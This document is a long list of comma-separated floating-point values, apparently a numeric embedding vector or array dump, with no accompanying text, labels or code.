-0.02980811335146427, 0.020657921209931374, -0.033830661326646805, -0.020407432690262794, -0.02524038404226303, 0.002504883334040642, 0.008288216777145863, -0.00695105129852891, -0.005160796456038952, -0.0031384716276079416, 0.021483059972524643, -0.007043142803013325, -0.041492655873298645, -0.00700999004766345, -0.027951551601290703, 0.05852586403489113, -0.0020352178253233433, -0.03660076856613159, -0.028732486069202423, -0.009732209146022797, -0.03421375900506973, 0.008686051703989506, 0.0135705741122365, 0.04205257073044777, -0.0036339228972792625, -0.009746943600475788, -0.03026488609611988, 0.03223932161927223, -0.04373231902718544, -0.02989652007818222, -0.00043052685214206576, -0.008162973448634148, 0.016075458377599716, -0.018683483824133873, 0.004379862453788519, -0.0024625214282423258, -0.01939074508845806, -0.03138471767306328, -0.0009540658793412149, -0.05177741497755051, -0.03282870724797249, -0.01881609484553337, -0.015412400476634502, -0.018226711079478264, 0.04054964333772659, 0.01564815454185009, -0.02339855767786503, 0.002795891836285591, 0.010778365656733513, 0.017843611538410187, -0.005403917748481035, -0.014108387753367424, -0.016443822532892227, -0.0014182060258463025, -0.0017856503836810589, -0.0006068816874176264, -0.019994864240288734, -0.06754344701766968, -0.03660076856613159, 0.003086900571361184, 0.013946306891739368, -0.03386012837290764, -0.043791256844997406, -0.008848132565617561, 0.005422336049377918, -0.029587093740701675, -0.011021487414836884, -0.015707092359662056, -0.018153037875890732, 0.017843611538410187, 0.014881954528391361, -0.004604564979672432, 0.014756710268557072, -0.003039012895897031, -0.013018026947975159, 0.007654629182070494, 0.004206730518490076, -0.030161743983626366, 0.013386392034590244, 0.0054444377310574055, 0.005669140722602606, -0.03719015046954155, -0.0002484162978362292, -0.030942678451538086, -0.01513244304805994, 0.03895830363035202, -0.04096221178770065, -0.01906658336520195, 0.02124730497598648, -0.010115308687090874, 0.005286040715873241, 0.009489087387919426, 0.008479767479002476, -0.012399173341691494, -0.011183567345142365, 0.006759501527994871, 0.024076350033283234, 0.016149131581187248, 0.025461403653025627, 0.023531168699264526, 0.009732209146022797, 0.0401076041162014, -0.021217836067080498, -0.011279342696070671, -0.028894567862153053, -0.015309258364140987, -0.04446904733777046, -0.0008799323695711792, -0.009290170855820179, 0.0005304458900354803, 0.009481720626354218, 0.014027346856892109, -0.03978344425559044, -0.0032434556633234024, 0.013482166454195976, -0.01939074508845806, -0.029970193281769753, -0.0016806662315502763, 0.006822123657912016, -0.03945928066968918, 0.0005272226990200579, 0.008479767479002476, 0.021600935608148575, -0.0027664226945489645, -0.024267900735139847, 0.03925299644470215, -0.038074228912591934, 0.010520510375499725, -0.007499915547668934, -0.0170479416847229, 0.014322039671242237, 0.03533359244465828, -0.01791728474199772, -0.03167940676212311, 0.005020817741751671, -0.036630235612392426, -0.05189529061317444, -0.05451805144548416, 0.031090022996068, 0.05761231854557991, 0.009489087387919426, -0.027524247765541077, 0.0321214459836483, -0.03442004695534706, 0.014218897558748722, 0.029380809515714645, -0.039842382073402405, -0.03521571308374405, 0.0013647930463775992, -0.030647985637187958, -0.062238987535238266, -0.028349386528134346, 0.030824800953269005, 0.05109962075948715, -0.02941027842462063, -0.018830830231308937, -0.019759109243750572, -0.018919236958026886, -0.01482301577925682, 0.009548026137053967, -0.014513589441776276, 0.021188367158174515, 0.022470278665423393, 0.027362167835235596, -0.0017119772965088487, 0.000931043061427772, 0.021851424127817154, 0.03524518385529518, -0.005079756025224924, 0.055490534752607346, -0.05867321044206619, -0.03406641632318497, 0.0023501699324697256, 0.02787787839770317, 0.004048333503305912, 0.003904671175405383, -0.05148272216320038, 0.006998938973993063, -0.010402633808553219, 0.03167940676212311, -0.025461403653025627, 0.02174828201532364, -0.002637494821101427, -0.010439470410346985, -0.010491041466593742, -0.032062508165836334, 0.027701063081622124, -0.018138302490115166, -0.012539152055978775, -0.018712952733039856, -0.04081486538052559, 0.01819724217057228, 0.00831768661737442, -0.032268792390823364, 0.023663781583309174, -0.010940446518361568, -0.034862082451581955, 0.04700339958071709, -0.021188367158174515, 0.022764969617128372, 0.03200357034802437, -0.004077802877873182, 0.033624377101659775, -0.006969469599425793, 0.003074007574468851, -0.00566177349537611, 0.038074228912591934, -0.05333928391337395, -0.045028962194919586, -0.022558685392141342, 0.018830830231308937, -0.024061614647507668, -0.03318233788013458, 0.003392643528059125, -0.016915330663323402, -0.013828430324792862, -0.02594764530658722, 0.014550426043570042, -0.03335915505886078, 0.004037282895296812, 0.03521571308374405, -0.0018528769724071026, -0.029881786555051804, -0.01068995799869299, 0.02165987528860569, 0.02647809125483036, -0.021718813106417656, -0.010373163968324661, 0.009614331647753716, 0.05861427262425423, 0.028157835826277733, 0.03442004695534706, -0.0380447581410408, -0.013106434606015682, 0.017283694818615913, -0.013894735835492611, -0.01697426848113537, 0.03769112750887871, -0.008870234712958336, -0.008310318924486637, -0.020068537443876266, -0.02496042661368847, 0.025505607947707176, -0.0006363508873619139, -0.016856392845511436, -0.046148791909217834, -0.01663537323474884, 0.002541719935834408, 0.06654149293899536, -0.00015586453082505614, -0.04249460995197296, -0.03898777440190315, -0.026920130476355553, -0.01276753842830658, 0.012738068588078022, 0.02870301716029644, 0.009850085712969303, -0.02280917391180992, -0.032268792390823364, 0.0036136626731604338, -0.007676730863749981, -0.05958675593137741, 0.017195288091897964, -0.008089300245046616, 0.011839257553219795, 0.009960595518350601, 0.04331975057721138, -0.013806328177452087, 0.0063064126297831535, 0.011235139332711697, 0.01348953414708376, -0.057347096502780914, -0.011949767358601093, -0.0018105149501934648, -0.006052240263670683, -0.002180722076445818, 0.005035552196204662, -0.008516604080796242, 0.0018537979340180755, -0.04164000228047371, 0.017018472775816917, 0.022971253842115402, -0.00046414017560891807, 0.005779650062322617, -0.031974099576473236, 0.0017856503836810589, -0.012443376705050468, 0.0024643633514642715, 0.032681360840797424, -0.013084332458674908, -0.004317240323871374, 0.017681529745459557, -0.021232571452856064, -0.002105207182466984, -0.012944353744387627, 0.010888875462114811, 0.010918344371020794, -0.0014007086865603924, 0.028806159272789955, 0.007304681930691004, -0.0012570462422445416, 0.012185521423816681, -0.004018864594399929, -0.009629067033529282, 0.02557927928864956, 0.02792208269238472, 0.002659596735611558, -0.042023103684186935, -0.030235417187213898, 0.012517049908638, 0.005908578168600798, -0.032799236476421356, -0.025004630908370018, 0.02244080789387226, 0.011772952042520046, 0.0161049272865057, -0.04608985409140587, 0.042641956359148026, 0.037455376237630844, 0.006133280694484711, -0.008921805769205093, -0.03660076856613159, 0.0521310456097126, -0.0055549475364387035, -0.013202209025621414, 0.005960149224847555, -0.0822780504822731, 0.0009107829537242651, -0.01573656126856804, -0.01746051013469696, -0.015987049788236618, -0.0007592928013764322, 0.011618238873779774, 0.04641401767730713, 0.01849193312227726, -0.023914270102977753, -0.023870065808296204, -0.009010213427245617, 0.034655798226594925, 0.05722922086715698, 0.011043588630855083, 0.02062845230102539, -0.009665902704000473, -0.01947915181517601, -0.03282870724797249, -0.03592297434806824, 0.023089131340384483, -0.022013504058122635, 0.057140812277793884, 0.007529384922236204, -0.0011271975236013532, -0.022381870076060295, 0.04608985409140587, -0.0009209130075760186, -0.009909024462103844, 0.021365182474255562, 0.01122040394693613, -0.03353596851229668, -0.001408996875397861, -0.006100127939134836, 0.0007086425903253257, -0.02379639260470867, 0.006803705357015133, 0.019243398681282997, 0.03474420681595802, -0.022308196872472763, -0.012797007337212563, -0.0001703689049463719, 0.009894290007650852, -0.0077356696128845215, -0.0240026768296957, -0.005193949677050114, 0.03335915505886078, 0.012229724787175655, -0.0034423728939145803, 0.0033613324631005526, -0.00909862108528614, -0.0080082593485713, -0.007809342350810766, -0.026758048683404922, -0.01638488471508026, -0.009334374219179153, 0.024989895522594452, -0.0321214459836483, 0.020864205434918404, 0.018801359459757805, -0.005065021570771933, 0.007875648327171803, -0.01865401491522789, -0.0015277947532013059, 0.015707092359662056, -0.006917898543179035, -0.010822569951415062, -0.009872187860310078, -0.0078019751235842705, 0.03002913109958172, -0.005050287116318941, -0.0200538020581007, 0.012841211631894112, 0.004044650122523308, -0.02420896105468273, 0.03332968428730965, -0.023369088768959045, 0.01844772882759571, -0.03244560956954956, -0.027524247765541077, -0.012797007337212563, -0.009503822773694992, -0.0023704301565885544, -0.0032968686427921057, -0.024150023236870766, -0.002596974838525057, 0.006450074724853039, 0.042229387909173965, -0.009754310362040997, 0.004151476081460714, -0.0002958433178719133, 0.02980811335146427, -0.008236645720899105, -0.036011382937431335, 0.021630404517054558, -0.004011497367173433, 0.0055844164453446865, 0.00969537254422903, 0.03359490633010864, -0.007617792580276728, 0.02021588198840618, 0.028143102303147316, -0.022249259054660797, -0.0034386892803013325, -0.017313165590167046, 0.006505329627543688, 0.013872633688151836, -0.0021273090969771147, 0.026139196008443832, 0.01617860049009323, -0.03937087208032608, -0.005356030073016882, 0.0012146843364462256, -0.0021512529347091913, 0.05669877305626869, -0.021969301626086235, 0.0022488695103675127, -0.01860981062054634, -0.03957716003060341, -0.009518557228147984, 0.017077410593628883, -0.013872633688151836, -0.012995924800634384, -0.005392866674810648, 0.02759792096912861, 0.0301470085978508, 0.012038175016641617, -0.00898074358701706, -0.028437795117497444, -0.009702739305794239, 0.013798960484564304, -0.019449682906270027, -0.004670870956033468, -0.01336428988724947, -0.0012717809295281768, 0.02092314325273037, 0.0022949152626097202, 0.02326594665646553, 0.03471473604440689, -0.024444716051220894, -0.022131381556391716, 0.021276773884892464, 0.02112942934036255, 0.00639481982216239, -0.006004353053867817, 0.03397800773382187, 0.055903103202581406, -0.011876094155013561, -0.0240026768296957, -0.03265189379453659, -0.010454204864799976, -0.004122006706893444, -0.005013450514525175, 0.020952614024281502, -0.02664017118513584, -0.025682423263788223, 0.016694311052560806, -0.00550705986097455, 0.025210915133357048, -0.005006083287298679, 0.014572527259588242, 0.017475245520472527, -0.0032010937575250864, -0.0011189093347638845, -0.006442707497626543, -0.019950659945607185, 0.0017663112375885248, -0.012487580999732018, 0.022219790145754814, -0.019361276179552078, 0.008361889980733395, 0.017637325450778008, 0.016001785174012184, -0.011235139332711697, -0.010137410834431648, -0.02335435524582863, 0.006936316844075918, 0.023781657218933105, -0.010778365656733513, 0.002320700790733099, 0.030854269862174988, 0.0292039941996336, 0.0014329407131299376, -0.0011640340089797974, -0.011640341021120548, 0.0120455427095294, -0.003652340965345502, -0.02420896105468273, -0.04841792210936546, -0.02656649984419346, 0.0046266671270132065, -0.04040229693055153, -0.011279342696070671, 0.02277970500290394, 0.03533359244465828, 0.010822569951415062, -0.025800298899412155, 0.017489980906248093, 0.016458557918667793, -0.0080082593485713, 0.021689344197511673, 0.0023280680179595947, -0.000664438761305064, -0.003446056507527828, -0.025888707488775253, -0.014572527259588242, 0.00714628491550684, -0.008884969167411327, 0.017887813970446587, -0.0040151807479560375, -0.01750471442937851, -0.055785227566957474, -0.016399618238210678, 0.015913376584649086, -0.03450845181941986, 0.011227771639823914, 0.0339190699160099, 0.006962102372199297, 0.011456158012151718, -0.023737454786896706, -0.02557927928864956, 0.0032839758787304163, 0.006203270051628351, -0.02487201988697052, 0.010159512050449848, -0.004339342005550861, -0.002794050145894289, 0.01538293156772852, 0.013857899233698845, 0.012384437955915928, -0.010034268721938133, -0.017313165590167046, -0.022823909297585487, 0.008899703621864319, -0.030382761731743813, -0.02112942934036255, 0.007455711718648672, -0.02244080789387226, 0.004762961994856596, -0.0027056424878537655, 0.02890930138528347, 0.0031255788635462523, -0.01918446086347103, -0.010174247436225414, 0.01455779280513525, 0.019655967131257057, -0.008266115561127663, 0.012023440562188625, 0.0024422614369541407, -0.009017580188810825, 0.00610381131991744, -0.007238376419991255, -0.004169894382357597, 0.02273550070822239, -0.03291711583733559, 0.04007813334465027, -0.024577327072620392, -0.00047242839355021715, 0.017725734040141106, 0.015721827745437622, -0.008943906985223293, -0.006774235982447863, 0.014078917913138866, 0.0005677428562194109, -0.02973444014787674, -0.01132354699075222, 0.013585308566689491, -0.01179505418986082, 0.011353015899658203, -0.028526201844215393, 0.0004834793508052826, -0.011205669492483139, 0.017725734040141106, 0.0038678348064422607, 0.02037796378135681, 0.0027443207800388336, -0.007883015088737011, 0.01606072299182415, 0.002735111629590392, -0.01993592455983162, -0.023295415565371513, 0.0260655228048563, -0.00012904293544124812, -0.01828564889729023, -0.03727855905890465, -0.0027424790896475315, 0.04214097931981087, 0.010196348652243614, -0.012229724787175655, 0.020746327936649323, 0.0028621975798159838, 0.009621699340641499, 0.003724172245711088, 0.0025140924844890833, -0.01860981062054634, -0.005260255187749863, -0.005348662845790386, -0.008560807444155216, 0.036748114973306656, -0.0008504631696268916, -0.023457497358322144, -0.00253803632222116, -0.016163865104317665, -0.009518557228147984, 0.004597197752445936, 0.0171805527061224, -0.01217078696936369, 0.009997432120144367, 0.01695953495800495, -0.012634926475584507, 0.013482166454195976, 0.011787686496973038, 0.0019486519740894437, 0.0020481105893850327, -0.009135456755757332, 0.023781657218933105, 0.009879554621875286, 0.032799236476421356, 0.0036836520303040743, -0.02338382415473461, -0.012517049908638, -0.010645754635334015, 0.011036221869289875, -0.05958675593137741, 0.018521402031183243, 0.006862643640488386, 0.03327074646949768, -0.024886753410100937, 0.04352603480219841, -0.010822569951415062, -0.005090807098895311, 0.01840352639555931, -0.003232404822483659, -0.009923758916556835, -0.023707984015345573, -0.02021588198840618, 0.010977283120155334, -0.0024422614369541407, -0.02783367596566677, 0.025873972102999687, 0.02574136108160019, -0.005617569666355848, 0.027376903221011162, -0.018786625936627388, -0.0008587514166720212, -0.015147177502512932, -0.0012017914559692144, 0.0170479416847229, -0.006037505809217691, 0.007385722361505032, 0.031767815351486206, 0.0026061837561428547, -0.031561531126499176, 0.01480828132480383, -0.005772282835096121, -0.01048367377370596, -0.057347096502780914, -0.011050956323742867, -0.007271529175341129, 0.005429703276604414, -0.00009237908670911565, 0.02269129641354084, -0.01027738954871893, -0.0017082936828956008, 0.0100932065397501, -0.012715967372059822, -0.034979961812496185, 0.0071610198356211185, 0.009091253392398357, 0.019832782447338104, 0.004704023711383343, -0.02342802658677101, -0.0039672935381531715, 0.012480213306844234, -0.009938493371009827, 0.030294355005025864, -0.003431321820244193, 0.015662888064980507, -0.0057243951596319675, -0.00994586106389761, 0.012590723112225533, -0.018595075234770775, -0.030117539688944817, 0.018727688118815422, 0.012664396315813065, -0.01126460824161768, -0.0038531001191586256, -0.005886476021260023, -0.005831221118569374, -0.004726125858724117, -0.008619746193289757, -0.002716693328693509, -0.05171847715973854, 0.0020665288902819157, -0.0029045597184449434, 0.013946306891739368, 0.005090807098895311, -0.02636021375656128, 0.0200538020581007, 0.033093929290771484, 0.006608471740037203, -0.0200538020581007, -0.030294355005025864, -0.0027019588742405176, -0.019862251356244087, -0.049390409141778946, -0.014638833701610565, 0.009673270396888256, 0.05272042751312256, -0.0009089411469176412, -0.024194227531552315, -0.015677623450756073, -0.008000892587006092, -0.0036155045963823795, -0.010763631202280521, -0.019007645547389984, -0.017593123018741608, -0.005647038575261831, 0.024356307461857796, 0.0008338867337442935, 0.004667187109589577, -0.00566177349537611, -0.022912316024303436, 0.018388791009783745, -0.007499915547668934, 0.0077283019199967384, 0.012590723112225533, -0.006877378560602665, -0.04043176397681236, 0.006446391344070435, -0.01832985319197178, 0.011131996288895607, -0.023207008838653564, 0.011964501813054085, 0.021998770534992218, 0.02865881286561489, -0.010940446518361568, 0.0221166480332613, 0.016944799572229385, -0.020333759486675262, -0.021158898249268532, -0.0026061837561428547, -0.018550872802734375, -0.005278673488646746, 0.019405478611588478, -0.018889768049120903, -0.015397666022181511, -0.044940557330846786, 0.02079053223133087, -0.011728748679161072, 0.01108042523264885, -0.003226879285648465, -0.012671763077378273, 0.0069105313159525394, 0.01771099865436554, -0.04986191540956497, 0.022927051410079002, 0.004250934347510338, -0.006800021976232529, -0.007076295558363199, 0.03371278569102287, -0.00661952281370759, 0.024606795981526375, -0.03503889963030815, 0.02009800635278225, 0.010660489089787006, -0.04052017256617546, -0.013216943480074406, 0.0007804738124832511, -0.02425316534936428, -0.02351643517613411, 0.002830886747688055, -0.017357368022203445, 0.014064183458685875, -0.027494778856635094, 0.02429736964404583, 0.00994586106389761, -0.006461125798523426, 0.027288494631648064, 0.00844293087720871, -0.008089300245046616, 0.01021108403801918, -0.025711892172694206, -0.00895864237099886, 0.020525310188531876, 0.0029653399251401424, -0.007197856437414885, -0.0036339228972792625, -0.024267900735139847, -0.027244290336966515, 0.01816777139902115, 0.022426074370741844, 0.029130320996046066, -0.019626498222351074, 0.013688451610505581, 0.01010794099420309, 0.0024477867409586906, 0.004464586265385151, 0.006682144943624735, -0.018182506784796715, -0.014734608121216297, 0.019876986742019653, -0.010476307012140751, 0.013548471964895725, 0.0010765473125502467, -0.02560875006020069, 0.03386012837290764, 0.03282870724797249, 0.03562828153371811, -0.05012713745236397, -0.028968239203095436, 0.03126683831214905, -0.021718813106417656, -0.0015904167667031288, 0.015780765563249588, -0.016163865104317665, 0.007669363636523485, 0.014034714549779892, 0.006416921969503164, 0.004600881598889828, -0.004438800737261772, -0.005267622414976358, 0.0030224365182220936, 0.01453569158911705, -0.02000959776341915, -0.0034405309706926346, -0.0010931238066405058, -0.023825861513614655, 0.029336605221033096, 0.06032348796725273, 0.003908354789018631, -0.0023870065342634916, -0.003591560758650303, -0.0019265500595793128, 0.01105832401663065, -0.004792431369423866, 0.010549979284405708, 0.018094098195433617, -0.03397800773382187, 0.008229278959333897, -0.020540043711662292, 0.04676764830946922, -0.010336327366530895, 0.021055756136775017, -0.005024501588195562, -0.0007399535970762372, -0.0240910854190588, 0.0070320917293429375, 0.007138917688280344, -0.001963386544957757, -0.015235585160553455, 0.00214204378426075, -0.008546072989702225, -0.011772952042520046, -0.023369088768959045, -0.0010673381621018052, -0.009327007457613945, 0.002173354849219322, 0.022632358595728874, -0.00273879524320364, -0.002038901438936591, 0.004630350507795811, -0.007440977264195681, 0.022013504058122635, -0.014543058350682259, -0.0014983254950493574, 0.004947145003825426, 0.04214097931981087, -0.007720934692770243, -0.002324384404346347, -0.008266115561127663, -0.019213929772377014, 0.03235720098018646, -0.030589047819375992, -0.024798346683382988, -0.008678684011101723, -0.02808416448533535, 0.009024947881698608, -0.007890382781624794, -0.022514481097459793, -0.021144162863492966, -0.03129630908370018, 0.01396104134619236, -0.0012846736935898662, -0.0019523355877026916, 0.013533737510442734, 0.08027414977550507, -0.018315117806196213, 0.0016355415573343635, -0.014594629406929016, -0.020039066672325134, 0.017475245520472527, 0.028319917619228363, -0.009327007457613945, 0.01757838763296604, -0.043968070298433304, 0.013342187739908695, 0.024989895522594452, -0.009437516331672668, 0.011316179297864437, 0.028688281774520874, 0.015294523909687996, -0.01998012885451317, -0.013496900908648968, 0.014454650692641735, 0.007610425353050232, 0.018845563754439354, 0.011625605635344982, 0.0009218339109793305, -0.01631121151149273, 0.02656649984419346, -0.009813249111175537, -0.011714013293385506, -0.012797007337212563, -0.02874722145497799, -0.0035952443722635508, 0.009142824448645115, 0.01390210259705782, -0.01455779280513525, -0.016281742602586746, -0.0018215659074485302, 0.0009130852413363755, 0.000525380892213434, 0.013312718831002712, -0.019007645547389984, -0.0261981338262558, -0.006343248765915632, -0.031237369403243065, -0.007809342350810766, -0.0046819220297038555, 0.012133950367569923, 0.0018473515519872308, 0.01890450343489647, 0.008089300245046616, -0.026419153437018394, 0.01803516037762165, -0.021836688742041588, -0.0073304674588143826, -0.0007919851923361421, 0.004818216897547245, 0.020864205434918404, -0.007385722361505032, -0.016989003866910934, -0.007993524894118309, -0.007610425353050232, -0.018005691468715668, 0.0039599258452653885, 0.004947145003825426, -0.021733546629548073, 0.005293407943099737, -0.0017939385725185275, 0.005164480302482843, -0.026581233367323875, -0.011006752029061317, -0.0037702179979532957, 0.016694311052560806, 0.01581023447215557, 0.010520510375499725, -0.00698052067309618, 0.0026411786675453186, -0.0036504992749542, -0.014196795411407948, -0.012097113765776157, 0.008715520612895489, -0.017018472775816917, -0.025431934744119644, -0.0014145224122330546, 0.01318010687828064, 0.0028787741903215647, 0.012900149449706078, 0.00026499273371882737, 0.033418092876672745, -0.028526201844215393, -0.02096734754741192, 0.005333928391337395, -0.028776690363883972, -0.016237538307905197, 0.011227771639823914, 0.022838642820715904, -0.021158898249268532, 0.003232404822483659, 0.042023103684186935, 0.0077283019199967384, -0.020024333149194717, -0.01441044732928276, -0.01812356896698475, 0.020598983392119408, 0.013460065238177776, 0.004125690553337336, -0.004420382436364889, -0.01048367377370596, 0.004206730518490076, -0.014498854987323284, 0.01336428988724947, -0.011316179297864437, -0.005787017289549112, -0.0013491376303136349, -0.02014220878481865, -0.004225148819386959, -0.0041367411613464355, 0.002561979927122593, -0.006932633463293314, -0.0034018526785075665, 0.009349108673632145, -0.011190935038030148, -0.0343611054122448, -0.022205054759979248, 0.005344978999346495, 0.005484958179295063, -0.025255119428038597, 0.0120455427095294, 0.018374057486653328, 0.03509783744812012, -0.04664976894855499, 0.009444884024560452, 0.009857453405857086, 0.004641401581466198, 0.009334374219179153, 0.015427134931087494, 0.006052240263670683, 0.00586805772036314, -0.02718535251915455, 0.011006752029061317, 0.01606072299182415, -0.0005032789777033031, 0.022588154301047325, -0.011581402271986008, 0.008347155526280403, 0.002162303775548935, 0.025137241929769516, -0.0010047161485999823, -0.0008582909358665347, -0.0017276328289881349, -0.0054260194301605225, 0.019037114456295967, 0.01642908900976181, 0.018580341711640358, -0.023501699790358543, 0.008605011738836765, 0.009769045747816563, 0.001449517090804875, -0.021674608811736107, 0.01396104134619236, -0.00805246364325285, -0.0017368419794365764, 0.01693006418645382, 0.009599597193300724, 0.019744375720620155, 0.008796561509370804, -0.017106879502534866, -0.01027738954871893, 0.05036289244890213, -0.015265054069459438, 0.0009549867827445269, -0.014218897558748722, 0.009960595518350601, 0.02459206059575081, -0.00003703797119669616, -0.03450845181941986, -0.01119830273091793, -0.0005193949327804148, 0.03474420681595802, 0.004247250966727734, 0.013253780081868172, 0.03312340006232262, -0.01272333413362503, 0.016090191900730133, 0.002097839955240488, 0.021836688742041588, 0.011492994613945484, 0.0022507114335894585, 0.012686497531831264, 0.00399307906627655, 0.005890159867703915, -0.02677278406918049, 0.008022994734346867, 0.01688586175441742, 0.028481997549533844, -0.02092314325273037, -0.008877601474523544, 0.0023520118556916714, -0.045323655009269714, -0.008126136846840382, -0.02459206059575081, 0.0011235139099881053, -0.01289278268814087, -0.012826476246118546, -0.02182195521891117, 0.00685527641326189, 0.011249873787164688, -0.0022857061121612787, -0.04361443966627121, -0.015471339225769043, 0.0120676439255476, 0.008177707903087139, 0.011036221869289875, 0.0023483282420784235, -0.0071241832338273525, 0.005879108794033527, 0.009400679729878902, 0.03618819639086723, 0.004424066282808781, -0.017106879502534866, -0.035392530262470245, 0.006004353053867817, 0.016488026827573776, 0.0053044590167701244, 0.004361444152891636, -0.01297382265329361, 0.016001785174012184, -0.024223696440458298, -0.004556677769869566, 0.021925097331404686, -0.02755371853709221, 0.012509682215750217, 0.006888429634273052, -0.02347223088145256, -0.015603950247168541, 0.0008960483828559518, 0.0032139865215867758, 0.0008085616282187402, -0.011168832890689373, 0.0023704301565885544, -0.0003844811872113496, 0.0031568899285048246, 0.0034828931093215942, 0.015574481338262558, -0.006052240263670683, -0.025343526154756546, -0.0060743424110114574, 0.0015554220881313086, -0.00033797507057897747, -0.007440977264195681, 0.028673548251390457, 0.0007942874799482524, 0.0018519561272114515, -0.016989003866910934, -0.002335435478016734, 0.00589752709493041, -0.018550872802734375, -0.006516380701214075, -0.002158620161935687, 0.009931125678122044, -0.03047117032110691, -0.012922251597046852, -0.023044927045702934, 0.05313299968838692, -0.023707984015345573, -0.003709437558427453, 0.023545904085040092, -0.041080087423324585, 0.013143270276486874, -0.02087894082069397, -0.004401964135468006, -0.006973153445869684, 0.007426242809742689, -0.009702739305794239, 0.005904894322156906, 0.003689177567139268, -0.013843164779245853, -0.0006685828557237983, 0.0017138191033154726, -0.0027203771751374006, -0.013194842264056206, -0.036748114973306656, 0.014373610727488995, 0.0010618127416819334, 0.044174354523420334, 0.015397666022181511, -0.02578556537628174, -0.0064095547422766685, 0.0007201539701782167, -0.04635507985949516, 0.0009227548725903034, -0.022455543279647827, -0.013938939198851585, -0.009231232106685638, -0.010365797206759453, -0.00045861469698138535, -0.03150259330868721, 0.01533872727304697, 0.0024680469650775194, -0.010896243155002594, 0.028879832476377487, 0.012797007337212563, -0.011846625246107578, 0.012782272882759571, 0.023413293063640594, 0.019096052274107933, -0.009385945275425911, 0.004777696914970875, 0.004464586265385151, -0.024518389254808426, -0.012708599679172039, -0.016149131581187248, 0.0020941561087965965, -0.01002690102905035, -0.012995924800634384, -0.036836519837379456, -0.0027093261014670134, 0.001865769736468792, -0.013607410714030266, -0.02829044871032238, 0.010653122328221798, -0.023752188310027122, 0.013688451610505581, -0.006586370058357716, -0.01192029844969511, -0.017858345061540604, -0.010896243155002594, -0.02420896105468273, -0.008848132565617561, 0.007474130019545555, 0.010549979284405708, -0.015957580879330635, -0.015545011498034, 0.024975161999464035, 0.0012736227363348007, 0.015603950247168541, 0.01074889674782753, -0.023442761972546577, -0.0027627390809357166, 0.008487134240567684, 0.0015508175129070878, 0.00024266057880595326, -0.007422558963298798, -0.027524247765541077, 0.03769112750887871, -0.00015874237578827888, 0.005171847529709339, 0.013342187739908695, 0.005510743707418442, -0.003317128634080291, 0.0014578052796423435, -0.003722330555319786, -0.03005860187113285, -0.024120554327964783, 0.012546518817543983, 0.0017119772965088487, 0.0012478370917961001, -0.0027848409954458475, 0.020613716915249825, 0.011500362306833267, 0.00740045728161931, 0.024474184960126877, -0.02239660546183586, -0.014403079636394978, -0.0003987553354818374, -0.005982250906527042, 0.00412937393411994, -0.0054996926337480545, -0.02994072437286377, -0.00435407692566514, 0.0022857061121612787, 0.006542166229337454, 0.011286710388958454, 0.017607856541872025, -0.009083885699510574, 0.010638386942446232, -0.019302336499094963, 0.0001925859396578744, 0.001109700184315443, 0.0191549900919199, -0.026448622345924377, -0.01272333413362503, 0.04122743383049965, -0.01656170003116131, 0.016031254082918167, -0.008641847409307957, -0.00384573289193213, -0.00606329133734107, 0.00976167805492878, -0.010373163968324661, -0.03129630908370018, -0.005577049218118191, -0.02425316534936428, 0.028143102303147316, 0.012030807323753834, 0.016915330663323402, 0.04488161578774452, -0.012214990332722664, -0.0018712952733039856, -0.014697771519422531, 0.011677177622914314, -0.013437963090837002, -0.001763548469170928, -0.008966009132564068, -0.029999662190675735, -0.005297091789543629, 0.01569235883653164, 0.008715520612895489, 0.0069842045195400715, -0.019169725477695465, -0.020024333149194717, 0.035068366676568985, -0.004969246685504913, 0.015824969857931137, 0.0047666458413004875, -0.016620637848973274, -0.03162046894431114, -0.02681698650121689, -0.013916837982833385, -0.002891666954383254, 0.030736392363905907, 0.033830661326646805, -0.012089746072888374, 0.019405478611588478, -0.027789471670985222, -0.004387229681015015, -0.029218727722764015, -0.018182506784796715, -0.009570128284394741, -0.015928111970424652, 0.002361221006140113, -0.017121614888310432, 0.017357368022203445, -0.012406540103256702, -0.009754310362040997, 0.010616285726428032, -0.005433386657387018, 0.0032176701352000237, 0.009216497652232647, -0.0105426125228405, -0.009385945275425911, -0.024739407002925873, 0.00666004279628396, 0.006192218977957964, 0.007639894261956215, 0.0007606741855852306, -0.005915945395827293, 0.013548471964895725, 0.004891890101134777, -0.015824969857931137, 0.0015609476249665022, -0.01538293156772852, -0.020805267617106438, 0.016355415806174278, -0.017239492386579514, 0.005101858172565699, 0.010365797206759453, -0.000992744229733944, 0.004464586265385151, 0.008737622760236263, 0.0031992518343031406, 0.004818216897547245, -0.005831221118569374, 0.017401572316884995, -0.005753864534199238, 0.0054444377310574055, -0.009341741912066936, 0.017946753650903702, 0.0030647986568510532, -0.002075738040730357, -0.008531338535249233, -0.006534799002110958, -0.0063911364413797855, 0.02347223088145256, -0.0017377628246322274, 0.012148684822022915, 0.008818662725389004, 0.0009439358254894614, -0.0064758602529764175, -0.015021933242678642, -0.01638488471508026, 0.008273482322692871, 0.01080783549696207, 0.016812188550829887, 0.024371042847633362, -0.0010074788006022573, 0.004040966276079416, -0.0036431318148970604, -0.006055924110114574, 0.00937121082097292, -0.014970362186431885, -0.0033023941796272993, -0.017843611538410187, -0.008818662725389004, -0.01977384462952614, -0.005009766668081284, 0.0008601327426731586, 0.018094098195433617, 0.0027240607887506485, 0.0013141428353264928, 0.022293463349342346, 0.01581023447215557, 0.007794607896357775, -0.002852988662198186, -0.008236645720899105, -0.0073304674588143826, -0.019051847979426384, 0.013953674584627151, 0.008354523219168186, -0.017121614888310432, 0.011721380986273289, 0.01894870586693287, -0.0039967624470591545, 0.0020112739875912666, -0.015707092359662056, -0.0031053186394274235, -0.004066751804202795, 0.003827314591035247, 0.01008583977818489, 0.0002891666954383254, -0.001587653998285532, -0.00895864237099886, -0.0013528212439268827, -0.009002845734357834, 0.00018786625878419727, 0.021099958568811417, -0.013732654973864555, -0.007083662785589695, 0.0014596472028642893, 0.015633419156074524, -0.006490595173090696, -0.006170117296278477, -0.020657921209931374, -0.008826030418276787, 0.0190223790705204, -0.010859406553208828, -0.014152591116726398, 0.02454785816371441, -0.0052381535060703754, 0.03315286710858345, -0.018801359459757805, -0.0006510855164378881, -0.0023925320710986853, -0.0019357592100277543, -0.0034626328852027655, 0.0004551612655632198, 0.006667410489171743, -0.000941633596085012, -0.000754227745346725, 0.01874242164194584, -0.021306244656443596, -0.024577327072620392, 0.016414353623986244, 0.01422626432031393, 0.007267845794558525, 0.010557346977293491, -0.004512473940849304, -0.012679130770266056, -0.00873025506734848, -0.014012612402439117, 0.013600043952465057, -0.001010241569019854, -0.0042840875685215, -0.002534352708607912, 0.014609363861382008, 0.016694311052560806, 0.010461571626365185, -0.0023704301565885544, 0.01538293156772852, 